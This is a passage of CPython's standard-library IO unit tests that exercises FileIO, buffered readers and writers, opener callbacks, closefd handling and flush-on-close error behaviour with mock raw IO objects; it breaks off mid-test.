test_read_closed(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") with self.open(support.TESTFN, "r") as f: file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.read(), "egg\n") file.seek(0) file.close() self.assertRaises(ValueError, file.read) with self.open(support.TESTFN, "rb") as f: file = self.open(f.fileno(), "rb", closefd=False) self.assertEqual(file.read()[:3], b"egg") file.close() self.assertRaises(ValueError, file.readinto, bytearray(1)) def test_no_closefd_with_filename(self): # can't use closefd in combination with a file name self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False) def test_closefd_attr(self): with self.open(support.TESTFN, "wb") as f: f.write(b"egg\n") with self.open(support.TESTFN, "r") as f: self.assertEqual(f.buffer.raw.closefd, True) file = self.open(f.fileno(), "r", closefd=False) self.assertEqual(file.buffer.raw.closefd, False) def test_garbage_collection(self): # FileIO objects are collected, and collecting them flushes # all data to disk. with support.check_warnings(('', ResourceWarning)): f = self.FileIO(support.TESTFN, "wb") f.write(b"abcxxx") f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"abcxxx") def test_unbounded_file(self): # Issue #1174606: reading from an unbounded stream such as /dev/zero. 
zero = "/dev/zero" if not os.path.exists(zero): self.skipTest("{0} does not exist".format(zero)) if sys.maxsize > 0x7FFFFFFF: self.skipTest("test can only run in a 32-bit address space") if support.real_max_memuse < support._2G: self.skipTest("test requires at least 2 GiB of memory") with self.open(zero, "rb", buffering=0) as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "rb") as f: self.assertRaises(OverflowError, f.read) with self.open(zero, "r") as f: self.assertRaises(OverflowError, f.read) def check_flush_error_on_close(self, *args, **kwargs): # Test that the file is closed despite failed flush # and that flush() is called before file closed. f = self.open(*args, **kwargs) closed = [] def bad_flush(): closed[:] = [f.closed] raise OSError() f.flush = bad_flush self.assertRaises(OSError, f.close) # exception not swallowed self.assertTrue(f.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed f.flush = lambda: None # break reference loop def test_flush_error_on_close(self): # raw file # Issue #5700: io.FileIO calls flush() after file closed self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0) fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False) os.close(fd) # buffered io self.check_flush_error_on_close(support.TESTFN, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'wb', closefd=False) os.close(fd) # text io self.check_flush_error_on_close(support.TESTFN, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w') fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT) self.check_flush_error_on_close(fd, 'w', 
closefd=False) os.close(fd) def test_multi_close(self): f = self.open(support.TESTFN, "wb", buffering=0) f.close() f.close() f.close() self.assertRaises(ValueError, f.flush) def test_RawIOBase_read(self): # Exercise the default limited RawIOBase.read(n) implementation (which # calls readinto() internally). rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None)) self.assertEqual(rawio.read(2), b"ab") self.assertEqual(rawio.read(2), b"c") self.assertEqual(rawio.read(2), b"d") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"ef") self.assertEqual(rawio.read(2), b"g") self.assertEqual(rawio.read(2), None) self.assertEqual(rawio.read(2), b"") def test_types_have_dict(self): test = ( self.IOBase(), self.RawIOBase(), self.TextIOBase(), self.StringIO(), self.BytesIO() ) for obj in test: self.assertTrue(hasattr(obj, "__dict__")) def test_opener(self): with self.open(support.TESTFN, "w") as f: f.write("egg\n") fd = os.open(support.TESTFN, os.O_RDONLY) def opener(path, flags): return fd with self.open("non-existent", "r", opener=opener) as f: self.assertEqual(f.read(), "egg\n") def test_bad_opener_negative_1(self): # Issue #27066. def badopener(fname, flags): return -1 with self.assertRaises(ValueError) as cm: open('non-existent', 'r', opener=badopener) self.assertEqual(str(cm.exception), 'opener returned -1') def test_bad_opener_other_negative(self): # Issue #27066. 
        # Opener returning a negative fd other than -1 must raise
        # ValueError, and the message must name the offending value.
        def badopener(fname, flags):
            return -2
        with self.assertRaises(ValueError) as cm:
            open('non-existent', 'r', opener=badopener)
        self.assertEqual(str(cm.exception), 'opener returned -2')

    def test_fileio_closefd(self):
        # Issue #4841: re-running FileIO.__init__() with closefd=False must
        # not close the fd of the previously wrapped file, and .close()
        # must not close the currently wrapped fd either.
        with self.open(__file__, 'rb') as f1, \
             self.open(__file__, 'rb') as f2:
            fileio = self.FileIO(f1.fileno(), closefd=False)
            # .__init__() must not close f1
            fileio.__init__(f2.fileno(), closefd=False)
            f1.readline()
            # .close() must not close f2
            fileio.close()
            f2.readline()

    def test_nonbuffered_textio(self):
        # Text mode with buffering=0 is invalid; the rejection must not
        # leak an open file (no ResourceWarning).
        with support.check_no_resource_warning(self):
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', buffering=0)

    def test_invalid_newline(self):
        # An unrecognized newline argument must raise without leaking.
        with support.check_no_resource_warning(self):
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', newline='invalid')

    def test_buffered_readinto_mixin(self):
        # Test the implementation provided by BufferedIOBase
        class Stream(self.BufferedIOBase):
            def read(self, size):
                return b"12345"
            read1 = read
        stream = Stream()
        for method in ("readinto", "readinto1"):
            with self.subTest(method):
                buffer = byteslike(5)
                self.assertEqual(getattr(stream, method)(buffer), 5)
                self.assertEqual(bytes(buffer), b"12345")

    def test_fspath_support(self):
        # open() must accept os.PathLike objects yielding str or bytes,
        # and reject PathLike objects yielding anything else.
        def check_path_succeeds(path):
            with self.open(path, "w") as f:
                f.write("egg\n")

            with self.open(path, "r") as f:
                self.assertEqual(f.read(), "egg\n")

        check_path_succeeds(FakePath(support.TESTFN))
        check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))

        with self.open(support.TESTFN, "w") as f:
            bad_path = FakePath(f.fileno())
            with self.assertRaises(TypeError):
                self.open(bad_path, 'w')

        bad_path = FakePath(None)
        with self.assertRaises(TypeError):
            self.open(bad_path, 'w')

        # A __fspath__ that raises must propagate the original exception.
        bad_path = FakePath(FloatingPointError)
        with self.assertRaises(FloatingPointError):
            self.open(bad_path, 'w')

        # ensure that refcounting is correct with some error conditions
        with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
            self.open(FakePath(support.TESTFN), 'rwxa')

    def test_RawIOBase_readall(self):
        # Exercise the default unlimited RawIOBase.read() and readall()
        # implementations.
        rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
        self.assertEqual(rawio.read(), b"abcdefg")
        rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
        self.assertEqual(rawio.readall(), b"abcdefg")

    def test_BufferedIOBase_readinto(self):
        # Exercise the default BufferedIOBase.readinto() and readinto1()
        # implementations (which call read() or read1() internally).
        class Reader(self.BufferedIOBase):
            def __init__(self, avail):
                self.avail = avail
            def read(self, size):
                result = self.avail[:size]
                self.avail = self.avail[size:]
                return result
            def read1(self, size):
                """Returns no more than 5 bytes at once"""
                return self.read(min(size, 5))

        tests = (
            # (test method, total data available, read buffer size, expected
            #     read size)
            ("readinto", 10, 5, 5),
            ("readinto", 10, 6, 6),  # More than read1() can return
            ("readinto", 5, 6, 5),  # Buffer larger than total available
            ("readinto", 6, 7, 6),
            ("readinto", 10, 0, 0),  # Empty buffer
            ("readinto1", 10, 5, 5),  # Result limited to single read1() call
            ("readinto1", 10, 6, 5),  # Buffer larger than read1() can return
            ("readinto1", 5, 6, 5),  # Buffer larger than total available
            ("readinto1", 6, 7, 5),
            ("readinto1", 10, 0, 0),  # Empty buffer
        )
        UNUSED_BYTE = 0x81
        for test in tests:
            with self.subTest(test):
                method, avail, request, result = test
                reader = Reader(bytes(range(avail)))
                buffer = bytearray((UNUSED_BYTE,) * request)
                method = getattr(reader, method)
                self.assertEqual(method(buffer), result)
                # Buffer beyond the bytes actually read must be untouched.
                self.assertEqual(len(buffer), request)
                self.assertSequenceEqual(buffer[:result], range(result))
                unused = (UNUSED_BYTE,) * (request - result)
                self.assertSequenceEqual(buffer[result:], unused)
                self.assertEqual(len(reader.avail), avail - result)

    def test_close_assert(self):
        # IOBase.close() must survive a subclass whose __setattr__ swallows
        # writes and whose flush() raises.
        class R(self.IOBase):
            def __setattr__(self, name, value):
                pass
            def flush(self):
                raise OSError()
        f = R()
        # This would cause an assertion failure.
self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record = [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): 
record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. 
raw = self.MockRawIO() closed = [] def bad_flush(): closed[:] = [b.closed, raw.closed] raise OSError() raw.flush = bad_flush b = self.tp(raw) self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) self.assertTrue(raw.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) raw.flush = lambda: None # break reference loop def test_close_error_on_close(self): raw = self.MockRawIO() def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed b.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(b.closed) # Silence destructor error raw.close = lambda: None b.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 raw = self.MockRawIO() def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed b.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(b.closed) # Silence destructor error b.flush = lambda: None raw.close = lambda: None def test_multi_close(self): raw = self.MockRawIO() b = self.tp(raw) b.close() b.close() b.close() self.assertRaises(ValueError, b.flush) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) def test_readonly_attributes(self): raw = self.MockRawIO() buf = self.tp(raw) x = 
self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) 
self.assertEqual(b"c", bufio.read1(100)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"d", bufio.read1(100)) self.assertEqual(rawio._reads, 2) self.assertEqual(b"efg", bufio.read1(100)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1(100)) self.assertEqual(rawio._reads, 4) def test_read1_arbitrary(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"bc", bufio.read1()) self.assertEqual(b"d", bufio.read1()) self.assertEqual(b"efg", bufio.read1(-1)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1()) self.assertEqual(rawio._reads, 4) def test_readinto(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) b = bytearray(2) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"cd") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ef") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"gf") self.assertEqual(bufio.readinto(b), 0) self.assertEqual(b, b"gf") rawio = self.MockRawIO((b"abc", None)) bufio = self.tp(rawio) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"cb") def test_readinto1(self): buffer_size = 10 rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl")) bufio = self.tp(rawio, buffer_size=buffer_size) b = bytearray(2) self.assertEqual(bufio.peek(3), b'abc') self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"ab") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 1) self.assertEqual(b[:1], b"c") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"de") self.assertEqual(rawio._reads, 2) b = bytearray(2*buffer_size) self.assertEqual(bufio.peek(3), b'fgh') self.assertEqual(rawio._reads, 3) self.assertEqual(bufio.readinto1(b), 6) 
self.assertEqual(b[:6], b"fghjkl") self.assertEqual(rawio._reads, 4) def test_readinto_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readinto1_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto1(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readlines(self): def bufio(): rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef")) return self.tp(rawio) self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"]) self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"]) self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"]) def test_buffering(self): data = b"abcdefghi" dlen = len(data) tests = [ [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ], [ 100, [ 3, 3, 3], [ dlen ] ], [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ], ] for bufsize, buf_read_sizes, raw_read_sizes in tests: rawio = self.MockFileIO(data) bufio = self.tp(rawio, buffer_size=bufsize) pos = 0 for nbytes in buf_read_sizes: self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes]) pos += nbytes # this is mildly 
implementation-dependent self.assertEqual(rawio.read_history, raw_read_sizes) def test_read_non_blocking(self): # Inject some None's in there to simulate EWOULDBLOCK rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None)) bufio = self.tp(rawio) self.assertEqual(b"abcd", bufio.read(6)) self.assertEqual(b"e", bufio.read(1)) self.assertEqual(b"fg", bufio.read()) self.assertEqual(b"", bufio.peek(1)) self.assertIsNone(bufio.read()) self.assertEqual(b"", bufio.read()) rawio = self.MockRawIO((b"a", None, None)) self.assertEqual(b"a", rawio.readall()) self.assertIsNone(rawio.readall()) def test_read_past_eof(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(9000)) def test_read_all(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read()) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes with exactly the same number of 0's, # 1's... 255's. This will help us check that concurrent reading # doesn't duplicate or forget contents. 
N = 1000 l = list(range(256)) * N random.shuffle(l) s = bytes(bytearray(l)) with self.open(support.TESTFN, "wb") as f: f.write(s) with self.open(support.TESTFN, self.read_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] results = [] def f(): try: # Intra-buffer read then buffer-flushing read for n in cycle([1, 19]): s = bufio.read(n) if not s: break # list.append() is atomic results.append(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) s = b''.join(results) for i in range(256): c = bytes(bytearray([i])) self.assertEqual(s.count(c), N) finally: support.unlink(support.TESTFN) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) bufio.read(1) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) self.assertRaises(self.UnsupportedOperation, bufio.tell) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) # Silence destructor error bufio.close = lambda: None def test_no_extraneous_read(self): # Issue #9550; when the raw IO object has satisfied the read request, # we should not issue any additional reads, otherwise it may block # (e.g. socket). bufsize = 16 for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2): rawio = self.MockRawIO([b"x" * n]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) # Simple case: one raw read is enough to satisfy the request. self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) # A more complex case where two raw reads are needed to satisfy # the request. 
rawio = self.MockRawIO([b"x" * (n - 1), b"x"]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) def test_read_on_closed(self): # Issue #23796 b = io.BufferedReader(io.BytesIO(b"12")) b.read(1) b.close() self.assertRaises(ValueError, b.peek) self.assertRaises(ValueError, b.read1, 1) def test_truncate_on_read_only(self): rawio = self.MockFileIO(b"abc") bufio = self.tp(rawio) self.assertFalse(bufio.writable()) self.assertRaises(self.UnsupportedOperation, bufio.truncate) self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0) class CBufferedReaderTest(BufferedReaderTest, SizeofTest): tp = io.BufferedReader @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedReaderTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.read) def test_misbehaved_io_read(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) # _pyio.BufferedReader seems to implement reading different, so that # checking this is not so easy. self.assertRaises(OSError, bufio.read, 10) def test_garbage_collection(self): # C BufferedReader objects are collected. 
# The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(support.unlink, support.TESTFN) with support.check_warnings(('', ResourceWarning)): rawio = self.FileIO(support.TESTFN, "w+b") f = self.tp(rawio) f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedReader"): self.tp(io.BytesIO(), 1024, 1024, 1024) def test_bad_readinto_value(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: -1 bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsNone(cm.exception.__cause__) def test_bad_readinto_type(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: b'' bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsInstance(cm.exception.__cause__, TypeError) class PyBufferedReaderTest(BufferedReaderTest): tp = pyio.BufferedReader class BufferedWriterTest(unittest.TestCase, CommonBufferedTests): write_mode = "wb" def test_constructor(self): rawio = self.MockRawIO() bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(3, bufio.write(b"abc")) bufio.flush() self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) bufio.__init__(rawio) self.assertEqual(3, bufio.write(b"ghi")) bufio.flush() self.assertEqual(b"".join(rawio._write_stack), b"abcghi") def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.write, b'') bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.write(b''), 0) def test_detach_flush(self): raw = self.MockRawIO() 
buf = self.tp(raw) buf.write(b"howdy!") self.assertFalse(raw._write_stack) buf.detach() self.assertEqual(raw._write_stack, [b"howdy!"]) def test_write(self): # Write to the buffered IO but don't overflow the buffer. writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") self.assertFalse(writer._write_stack) buffer = bytearray(b"def") bufio.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data bufio.flush() self.assertEqual(b"".join(writer._write_stack), b"abcdef") def test_write_overflow(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) contents = b"abcdefghijklmnop" for n in range(0, len(contents), 3): bufio.write(contents[n:n+3]) flushed = b"".join(writer._write_stack) # At least (total - 8) bytes were implicitly flushed, perhaps more # depending on the implementation. self.assertTrue(flushed.startswith(contents[:-8]), flushed) def check_writes(self, intermediate_func): # Lots of writes, test the flushed output is as expected. contents = bytes(range(256)) * 1000 n = 0 writer = self.MockRawIO() bufio = self.tp(writer, 13) # Generator of write sizes: repeat each N 15 times then proceed to N+1 def gen_sizes(): for size in count(1): for i in range(15): yield size sizes = gen_sizes() while n < len(contents): size = min(next(sizes), len(contents) - n) self.assertEqual(bufio.write(contents[n:n+size]), size) intermediate_func(bufio) n += size bufio.flush() self.assertEqual(contents, b"".join(writer._write_stack)) def test_writes(self): self.check_writes(lambda bufio: None) def test_writes_and_flushes(self): self.check_writes(lambda bufio: bufio.flush()) def test_writes_and_seeks(self): def _seekabs(bufio): pos = bufio.tell() bufio.seek(pos + 1, 0) bufio.seek(pos - 1, 0) bufio.seek(pos, 0) self.check_writes(_seekabs) def _seekrel(bufio): pos = bufio.seek(0, 1) bufio.seek(+1, 1) bufio.seek(-1, 1) bufio.seek(pos, 0) self.check_writes(_seekrel) def test_writes_and_truncates(self): self.check_writes(lambda bufio: 
bufio.truncate(bufio.tell())) def test_write_non_blocking(self): raw = self.MockNonBlockWriterIO() bufio = self.tp(raw, 8) self.assertEqual(bufio.write(b"abcd"), 4) self.assertEqual(bufio.write(b"efghi"), 5) # 1 byte will be written, the rest will be buffered raw.block_on(b"k") self.assertEqual(bufio.write(b"jklmn"), 5) # 8 bytes will be written, 8 will be buffered and the rest will be lost raw.block_on(b"0") try: bufio.write(b"opqrwxyz0123456789") except self.BlockingIOError as e: written = e.characters_written else: self.fail("BlockingIOError should have been raised") self.assertEqual(written, 16) self.assertEqual(raw.pop_written(), b"abcdefghijklmnopqrwxyz") self.assertEqual(bufio.write(b"ABCDEFGHI"), 9) s = raw.pop_written() # Previously buffered bytes were flushed self.assertTrue(s.startswith(b"01234567A"), s) def test_write_and_rewind(self): raw = io.BytesIO() bufio = self.tp(raw, 4) self.assertEqual(bufio.write(b"abcdef"), 6) self.assertEqual(bufio.tell(), 6) bufio.seek(0, 0) self.assertEqual(bufio.write(b"XY"), 2) bufio.seek(6, 0) self.assertEqual(raw.getvalue(), b"XYcdef") self.assertEqual(bufio.write(b"123456"), 6) bufio.flush() self.assertEqual(raw.getvalue(), b"XYcdef123456") def test_flush(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") bufio.flush() self.assertEqual(b"abc", writer._write_stack[0]) def test_writelines(self): l = [b'ab', b'cd', b'ef'] writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_userlist(self): l = UserList([b'ab', b'cd', b'ef']) writer = 